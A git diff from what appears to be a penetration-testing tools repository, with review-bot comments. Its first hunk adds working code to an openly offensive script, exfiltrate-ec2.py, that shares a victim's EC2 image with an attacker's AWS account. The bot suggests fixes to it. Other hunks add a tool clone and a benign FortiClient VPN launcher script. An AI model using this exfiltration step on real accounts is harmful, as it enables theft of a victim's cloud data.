diff --git a/clouds/aws/exfiltrate-ec2.py b/clouds/aws/exfiltrate-ec2.py
index aa425d2..d9fa49a 100644
--- a/clouds/aws/exfiltrate-ec2.py
+++ b/clouds/aws/exfiltrate-ec2.py
@@ -21,6 +21,7 @@
 # CreateImage:
 # Abuses:
 # ec2:CreateImage
+# ec2:ModifyImageAttribute
 #
 # NOT FULLY IMPLEMENTED YET.
 # For this technique, the procedure is following - the script will create an image out of specified victim's EC2
@@ -351,13 +352,28 @@ To examine exfiltrated data:
 except Exception as e:
 Logger.fatal(f"ec2:CreateImage action on Victim failed. Exception: {e}")
- # Step 2: Import custom SSH RSA public key
+ target_user = self.get_account_id('attacker')
+ Logger.out(f"Step 2: Modifying image attributes to share it with UserId = {target_user}")
+ try:
+ modify_result = victim_client.modify_image_attribute(
+ Attribute = 'launchPermission',
+ ImageId = created_image['ImageId'],
+ OperationType = 'add',
+ UserIds = [
+ target_user,
+ ]
+ )
+ Logger.ok(f"Image's attributes modified to share it with user {target_user}")
+ except Exception as e:
+ Logger.fatal(f"ec2:ModifyImageAttribute action on Victim failed. Exception: {e}")
+
+ # Step 3: Import custom SSH RSA public key
 # client.import_key_pair(
 # KeyName = "Some key name"
 # PublicKeyMaterial = "key material"
 # )
- # Step 3: Create an instance from exported AMI
+ # Step 4: Create an instance from exported AMI
 # client.run_instances(
 # ImageId = "ami-00000000",
 # SecurityGroupIds = ["sg-00000", ],
@@ -370,7 +386,7 @@ To examine exfiltrated data:
 # Returns:
 # "i-00001111002222"
- # Step 4: Connect to that EC2 instance
+ # Step 5: Connect to that EC2 instance
 # client.describe_instances(
 # InstanceIds = ["i-00001111002222"],
 # Query = "Reservations[0].Instances[0].PublicIpAddress"
diff --git a/linux/prepare-kali.sh b/linux/prepare-kali.sh
index 876a71b..b30ad46 100644
--- a/linux/prepare-kali.sh
+++ b/linux/prepare-kali.sh
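Review bot: `modify_result` in the second hunk is assigned and never read; make it a bare call, `victim_client.modify_image_attribute(`, or log something from the response. `target_user` comes straight from `self.get_account_id('attacker')` with no check that it is non-empty before it is placed in `UserIds`, so an unresolved account id only surfaces as a generic ModifyImageAttribute failure in the except branch — a guard such as `if not target_user: Logger.fatal("Could not resolve attacker account id")` ahead of the call gives a precise message (assuming Logger.fatal aborts, as the CreateImage branch above relies on). The enclosing method begins before the second hunk and continues past the third.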
@@ -121,6 +121,7 @@ cd aws
 git_clone https://github.com/RhinoSecurityLabs/pacu.git ; cd pacu ; bash install.sh ; cd ..
 git_clone https://github.com/Alfresco/prowler.git
 git_clone https://github.com/sa7mon/S3Scanner.git
+git_clone https://github.com/percolate/ec2-security-groups-dumper.git
 git_clone https://github.com/ankane/s3tk.git
 git_clone https://github.com/andresriancho/enumerate-iam
 git_clone https://github.com/arkadiyt/aws_public_ips.git
diff --git a/others/README.md b/others/README.md
index ee16585..44be154 100644
--- a/others/README.md
+++ b/others/README.md
@@ -7,6 +7,8 @@ - **`encrypt.rb`** - Simple File Encryption utility (with support for Blowfish, GOST, IDEA, AES) capable of encrypting directories. ([gist](https://gist.github.com/mgeeky/751c01c4dac99871f4da))
+- **`forticlientsslvpn-expect.sh`** - Forticlient SSL VPN Client launching script utilizing expect. Useful while working for clients exposing their local networks through a Fortinet SSL VPN. [gist](https://gist.githubusercontent.com/mgeeky/8afc0e32b8b97fd6f96fce6098615a93/raw/cf127be09d02e04c00eb578e4ef1219a773d21cf/forticlientsslvpn-expect.sh)
+
 - **`playRTPStream.sh`** - Using rtpdump to play RTP streams from PCAP files with VLC. This script was useful to extract RTP Streams from sniffed VoIP communication and then with a help of VLC to dump those streams into valid .wav files. (https://github.com/hdiniz/rtpdump). [gist](https://gist.github.com/mgeeky/0b8bd81a3f6fb70eec543bc0bae2f079)
 - **`vm-manager.sh`** - A bash script offering several aliases/functions for quick management of a single Virtualbox VM machine. Handy to use it for example to manage a Kali box. By issuing `startkali` the VM will raise, `sshkali` - offers instant SSH into your VM, `getkali` - returns VM's IP address, `iskali` - checks whether VM is running, `stopkali` goes without explanation. [gist](https://gist.github.com/mgeeky/80b1f7addb792796d8bfb67188d72f4a) 
diff --git a/others/forticlientsslvpn-expect.sh b/others/forticlientsslvpn-expect.sh
new file mode 100644
index 0000000..0acfd1b
--- /dev/null
+++ b/others/forticlientsslvpn-expect.sh
@@ -0,0 +1,63 @@
+#!/bin/bash
+
+# Forticlient SSL VPN Client launching script utilizing expect.
+
+# --------------------------------------------
+# CONFIGURATION
+
+# If empty - script will take some simple logic to locate appropriate binary.
+FORTICLIENT_PATH=""
+
+# VPN Credentials
+VPN_HOST="host:10443"
+VPN_USER="username"
+VPN_PASS="password"
+
+# --------------------------------------------
+
+trap ctrl_c INT
+
+function ctrl_c() {
+ echo "Removing left-over files..."
+ rm -f /tmp/expect
+}
+
+if [[ $EUID -ne 0 ]]; then
+ echo "This script must be run as root"
+ exit 1
+fi
+
+if [ -z "$FORTICLIENT_PATH" ]; then
+ FORTICLIENT_PATH=`uname -r | grep -q 64 && echo $(locate forticlientsslvpn_cli | grep 64bit) || echo $(locate forticlientsslvpn_cli | grep 32bit)`
+ if [ ! -f $FORTICLIENT_PATH ]; then
+ echo "Tried to locate Forticlient SSL VPN Cli binary, but failed."
+ echo "Specify it at variable FORTCLIENT_PATH"
+ exit 1
+ fi
+ echo "Located Forticlient VPN Client at: $FORTICLIENT_PATH"
+fi
+
+echo "Killing previous instances of Forticlient SSL VPN client..."
+killall -9 $(basename $FORTICLIENT_PATH) 2> /dev/null
+
+cat << EOF > /tmp/expect
+#!/usr/bin/expect -f
+match_max 1000000
+set timeout -1
+spawn $FORTICLIENT_PATH --server $VPN_HOST --vpnuser $VPN_USER --keepalive
+expect "Password for VPN:"
+send -- "$VPN_PASS"
+send -- "\r"
+
+expect "Would you like to connect to this server? (Y/N)"
+send -- "Y"
+send -- "\r"
+
+expect "Clean up..."
+close
+EOF
+
+chmod 500 /tmp/expect
+/usr/bin/expect -f /tmp/expect
+
+rm -f /tmp/expect
\ No newline at end of file
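Review bot: The expect script holding `$VPN_PASS` is written to the fixed path `/tmp/expect` by a root process with the default umask and only chmod'ed afterwards, so the password is readable by other local users until the `chmod 500` runs, and a file or symlink already present at that shared path is followed by the redirect. Create it with `mktemp` under `umask 077` and delete it from an `EXIT` trap, which also covers the exits the current `INT`-only `ctrl_c` trap misses (the trailing `rm -f` is skipped when `expect` fails); the fragment below replaces the trap, the `ctrl_c` function, the `chmod` and the final `rm`. Separately, `[ ! -f $FORTICLIENT_PATH ]` is unquoted: when the `locate` lookup yields nothing it collapses to `[ ! -f ]`, which is false, so the script carries on to `killall` with an empty name — write `if [ ! -f "$FORTICLIENT_PATH" ]; then`. The message on the next line names `FORTCLIENT_PATH` while the variable is `FORTICLIENT_PATH`.
```shell
umask 077
EXPECT_SCRIPT="$(mktemp)" || exit 1
trap 'rm -f "$EXPECT_SCRIPT"' EXIT INT TERM

# … unchanged: root check, binary lookup, killall …

cat << EOF > "$EXPECT_SCRIPT"
# … unchanged: expect body …
EOF

/usr/bin/expect -f "$EXPECT_SCRIPT"
```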